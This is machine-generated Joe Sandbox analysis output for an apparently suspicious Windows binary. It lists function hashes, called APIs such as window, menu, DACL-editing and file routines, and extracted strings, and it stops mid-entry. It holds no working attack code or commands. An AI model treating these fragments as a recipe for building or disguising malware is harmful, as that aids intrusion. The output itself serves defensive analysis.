                                • Instruction ID: 06468db54d85d2648c7fb47ae03946cde550bb2cb6e2166f1c4111c02142c952
                                • Opcode Fuzzy Hash: 04500752a16081e9b86bab5296e659ce9f9861eed485a7acb270528035f6e187
                                • Instruction Fuzzy Hash: 3231A331A54209E6DF14FBA0CE43FFEB7B49F15751F600199B911724E1EF616E08C9A1
                                APIs
                                • LoadIconW.USER32(00000063), ref: 00AFC4D4
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AFC4E6
                                • SetWindowTextW.USER32(?,?), ref: 00AFC4FD
                                • GetDlgItem.USER32(?,000003EA), ref: 00AFC512
                                • SetWindowTextW.USER32(00000000,?), ref: 00AFC518
                                • GetDlgItem.USER32(?,000003E9), ref: 00AFC528
                                • SetWindowTextW.USER32(00000000,?), ref: 00AFC52E
                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AFC54F
                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AFC569
                                • GetWindowRect.USER32(?,?), ref: 00AFC572
                                • SetWindowTextW.USER32(?,?), ref: 00AFC5DD
                                • GetDesktopWindow.USER32 ref: 00AFC5E3
                                • GetWindowRect.USER32(00000000), ref: 00AFC5EA
                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AFC636
                                • GetClientRect.USER32(?,?), ref: 00AFC643
                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AFC668
                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AFC693
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                • String ID:
                                • API String ID: 3869813825-0
                                • Opcode ID: 6a1c2267b1f9ababc507fcb553c88cacbf990568caa6578c4d3e6af093c17b62
                                • Instruction ID: 34c836a27fc5bf9e388e26546f7a1de27af838c8e79ffff870a76d042279f401
                                • Opcode Fuzzy Hash: 6a1c2267b1f9ababc507fcb553c88cacbf990568caa6578c4d3e6af093c17b62
                                • Instruction Fuzzy Hash: 4F515F7190070DAFDB219FA9DE89B7EBBB5FF04715F004928F686A35A0CB74A905CB50
                                APIs
                                • _memset.LIBCMT ref: 00B2A4C8
                                • DestroyWindow.USER32(?,?), ref: 00B2A542
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B2A5BC
                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B2A5DE
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A5F1
                                • DestroyWindow.USER32(00000000), ref: 00B2A613
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B2A64A
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A663
                                • GetDesktopWindow.USER32 ref: 00B2A67C
                                • GetWindowRect.USER32(00000000), ref: 00B2A683
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B2A69B
                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B2A6B3
                                  • Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                • String ID: 0$tooltips_class32
                                • API String ID: 1297703922-3619404913
                                • Opcode ID: 574e6e64728455229f9d1613d162273317ef8c437b1a99797c6d2dfb0431afa4
                                • Instruction ID: e60221d0cbf338cba8a0c3915d302f57668cf9f20c664017fc69f910b0cbba07
                                • Opcode Fuzzy Hash: 574e6e64728455229f9d1613d162273317ef8c437b1a99797c6d2dfb0431afa4
                                • Instruction Fuzzy Hash: 2C719C71140205AFD721CF28DC45F6A7BF6FB88700F08496DF989972A0CB75E946CB52
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • DragQueryPoint.SHELL32(?,?), ref: 00B2C917
                                  • Part of subcall function 00B2ADF1: ClientToScreen.USER32(?,?), ref: 00B2AE1A
                                  • Part of subcall function 00B2ADF1: GetWindowRect.USER32(?,?), ref: 00B2AE90
                                  • Part of subcall function 00B2ADF1: PtInRect.USER32(?,?,00B2C304), ref: 00B2AEA0
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00B2C980
                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B2C98B
                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B2C9AE
                                • _wcscat.LIBCMT ref: 00B2C9DE
                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B2C9F5
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00B2CA0E
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CA25
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CA47
                                • DragFinish.SHELL32(?), ref: 00B2CA4E
                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B2CB41
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                • API String ID: 169749273-3440237614
                                • Opcode ID: d46c86c2e79ceb5c052360d2191e512974fdf5bd24071a4c23a281885df25a4b
                                • Instruction ID: a80cf67b5de74f1d425387c6d58f6476a086a90272ecb61298cfd50ddc966f4f
                                • Opcode Fuzzy Hash: d46c86c2e79ceb5c052360d2191e512974fdf5bd24071a4c23a281885df25a4b
                                • Instruction Fuzzy Hash: A3615771108301AFC711EF64DD85DAFBBE8EF89710F000A6EF595931A1DB709A49CB62
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00B246AB
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B246F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharMessageSendUpper
                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                • API String ID: 3974292440-4258414348
                                • Opcode ID: fa874c73226c3cebb606a1689c219b646a3a52f054cd257b174774b83011826b
                                • Instruction ID: 893e979ca5d62ea0a9fac33982a59253f50b33904966b9901147025193a520ed
                                • Opcode Fuzzy Hash: fa874c73226c3cebb606a1689c219b646a3a52f054cd257b174774b83011826b
                                • Instruction Fuzzy Hash: 70917C342047119FCB14EF20D591E6AB7E1EF99354F0448ACF89A5B7A2DB31ED4ACB81
                                APIs
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B2BB6E
                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B26D80,?), ref: 00B2BBCA
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2BC03
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B2BC46
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2BC7D
                                • FreeLibrary.KERNEL32(?), ref: 00B2BC89
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B2BC99
                                • DestroyIcon.USER32(?), ref: 00B2BCA8
                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B2BCC5
                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B2BCD1
                                  • Part of subcall function 00AC313D: __wcsicmp_l.LIBCMT ref: 00AC31C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                • String ID: .dll$.exe$.icl
                                • API String ID: 1212759294-1154884017
                                • Opcode ID: b32de3fe713d228e40614b35b391efdcc46e03c13e284ab28467f0cf08a731ea
                                • Instruction ID: 02342878c11d0314ba4b274d5977550d4290d3aa357612dbf09a8990b307c698
                                • Opcode Fuzzy Hash: b32de3fe713d228e40614b35b391efdcc46e03c13e284ab28467f0cf08a731ea
                                • Instruction Fuzzy Hash: 9261D071900629BEEB24DF64DD85FBA77B8EB08710F104269F919D61D0DF749980CBA0
                                APIs
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • CharLowerBuffW.USER32(?,?), ref: 00B0A636
                                • GetDriveTypeW.KERNEL32 ref: 00B0A683
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A6CB
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A702
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A730
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                • API String ID: 2698844021-4113822522
                                • Opcode ID: 88cd4acfa97083244f8f6fbbbf961a47d39849f0f668520b4f924b19cf50efba
                                • Instruction ID: 834d5171d4395d4d7f03a0722cbbb0f5ed70498c77795c8f663952d45146fd80
                                • Opcode Fuzzy Hash: 88cd4acfa97083244f8f6fbbbf961a47d39849f0f668520b4f924b19cf50efba
                                • Instruction Fuzzy Hash: FB512B711043059FC700EF20C99196BB7F4FF99758F1489ADF896572A1DB31AE0ACB52
                                APIs
                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0A47A
                                • __swprintf.LIBCMT ref: 00B0A49C
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0A4D9
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B0A4FE
                                • _memset.LIBCMT ref: 00B0A51D
                                • _wcsncpy.LIBCMT ref: 00B0A559
                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B0A58E
                                • CloseHandle.KERNEL32(00000000), ref: 00B0A599
                                • RemoveDirectoryW.KERNEL32(?), ref: 00B0A5A2
                                • CloseHandle.KERNEL32(00000000), ref: 00B0A5AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                • String ID: :$\$\??\%s
                                • API String ID: 2733774712-3457252023
                                • Opcode ID: f79af0a477b7a99b62fe4e29c06b5a697f0f73e2b78a3f49fcaaab3aa6b48898
                                • Instruction ID: cf23698d6cdc3a73e6fb050217dbd728b1925893b793706aa031074f145fbb70
                                • Opcode Fuzzy Hash: f79af0a477b7a99b62fe4e29c06b5a697f0f73e2b78a3f49fcaaab3aa6b48898
                                • Instruction Fuzzy Hash: 8B316EB650021AABDB21DFA0DC49FFB77BCEF89701F1041B6F909D61A0EB7096458B25
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                • String ID:
                                • API String ID: 884005220-0
                                • Opcode ID: fdb832adbd37fcd160d78635f332e63f8a6e47c6983251b1ad2777eaf7ce4a48
                                • Instruction ID: e011a99311498cb01b1f7a05da444ee7290453e4cd4eed93879e10911fd64a9c
                                • Opcode Fuzzy Hash: fdb832adbd37fcd160d78635f332e63f8a6e47c6983251b1ad2777eaf7ce4a48
                                • Instruction Fuzzy Hash: 18613472900205AFDB205F64D906B697BA5FF22731F15411BE813AB3D0DBB9CD81CB92
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B2C4EC
                                • GetFocus.USER32 ref: 00B2C4FC
                                • GetDlgCtrlID.USER32(00000000), ref: 00B2C507
                                • _memset.LIBCMT ref: 00B2C632
                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B2C65D
                                • GetMenuItemCount.USER32(?), ref: 00B2C67D
                                • GetMenuItemID.USER32(?,00000000), ref: 00B2C690
                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B2C6C4
                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B2C70C
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B2C744
                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B2C779
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                • String ID: 0
                                • API String ID: 1296962147-4108050209
                                • Opcode ID: bd577ced1024ed107c7b2107829fbcba784a0ef0925e5715402df062b7beec9a
                                • Instruction ID: 02e113f2dab4bcbbb53b2010c92f51eda53a1d1206c3577e865fa9cd8d4cffe6
                                • Opcode Fuzzy Hash: bd577ced1024ed107c7b2107829fbcba784a0ef0925e5715402df062b7beec9a
                                • Instruction Fuzzy Hash: 49817D702083219FD721CF24E984A6FBBE8FB98354F10496DF999932A1DB71DD05CB92
                                APIs
                                  • Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8766
                                  • Part of subcall function 00AF874A: GetLastError.KERNEL32(?,00AF822A,?,?,?), ref: 00AF8770
                                  • Part of subcall function 00AF874A: GetProcessHeap.KERNEL32(00000008,?,?,00AF822A,?,?,?), ref: 00AF877F
                                  • Part of subcall function 00AF874A: HeapAlloc.KERNEL32(00000000,?,00AF822A,?,?,?), ref: 00AF8786
                                  • Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF879D
                                  • Part of subcall function 00AF87E7: GetProcessHeap.KERNEL32(00000008,00AF8240,00000000,00000000,?,00AF8240,?), ref: 00AF87F3
                                  • Part of subcall function 00AF87E7: HeapAlloc.KERNEL32(00000000,?,00AF8240,?), ref: 00AF87FA
                                  • Part of subcall function 00AF87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8240,?), ref: 00AF880B
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8458
                                • _memset.LIBCMT ref: 00AF846D
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF848C
                                • GetLengthSid.ADVAPI32(?), ref: 00AF849D
                                • GetAce.ADVAPI32(?,00000000,?), ref: 00AF84DA
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF84F6
                                • GetLengthSid.ADVAPI32(?), ref: 00AF8513
                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF8522
                                • HeapAlloc.KERNEL32(00000000), ref: 00AF8529
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF854A
                                • CopySid.ADVAPI32(00000000), ref: 00AF8551
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8582
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF85A8
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF85BC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                • String ID:
                                • API String ID: 3996160137-0
                                • Opcode ID: 9403c56443a78f3e2069bba936eea0ed3dc2be85fae91980ab5e9ae076906075
                                • Instruction ID: b38eb318d8b5a427cb9874c25456e96d2df2ed14035113511bdc870295e56fc7
                                • Opcode Fuzzy Hash: 9403c56443a78f3e2069bba936eea0ed3dc2be85fae91980ab5e9ae076906075
                                • Instruction Fuzzy Hash: B3612B71A0020AABDF10DFA4DD45EBEBBB9FF05300F148169FA15A7291DB399A15CF60
                                APIs
                                • GetDC.USER32(00000000), ref: 00B176A2
                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B176AE
                                • CreateCompatibleDC.GDI32(?), ref: 00B176BA
                                • SelectObject.GDI32(00000000,?), ref: 00B176C7
                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B1771B
                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B17757
                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B1777B
                                • SelectObject.GDI32(00000006,?), ref: 00B17783
                                • DeleteObject.GDI32(?), ref: 00B1778C
                                • DeleteDC.GDI32(00000006), ref: 00B17793
                                • ReleaseDC.USER32(00000000,?), ref: 00B1779E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                • String ID: (
                                • API String ID: 2598888154-3887548279
                                • Opcode ID: 175b2a72394166634ca4f0f23080a65c617adb7e38583052946b80c54dfb2683
                                • Instruction ID: 603c7dcb87ff2df1e8b174476d8b38b20e239b1e01997c04e949eb6530d3f83b
                                • Opcode Fuzzy Hash: 175b2a72394166634ca4f0f23080a65c617adb7e38583052946b80c54dfb2683
                                • Instruction Fuzzy Hash: 8D514875904209EFCB25CFA8CC85EAEBBF9EF48710F14856DF949A7250DB31A941CB60
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,00B2FB78), ref: 00B0A0FC
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B0A11E
                                • __swprintf.LIBCMT ref: 00B0A177
                                • __swprintf.LIBCMT ref: 00B0A190
                                • _wprintf.LIBCMT ref: 00B0A246
                                • _wprintf.LIBCMT ref: 00B0A264
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
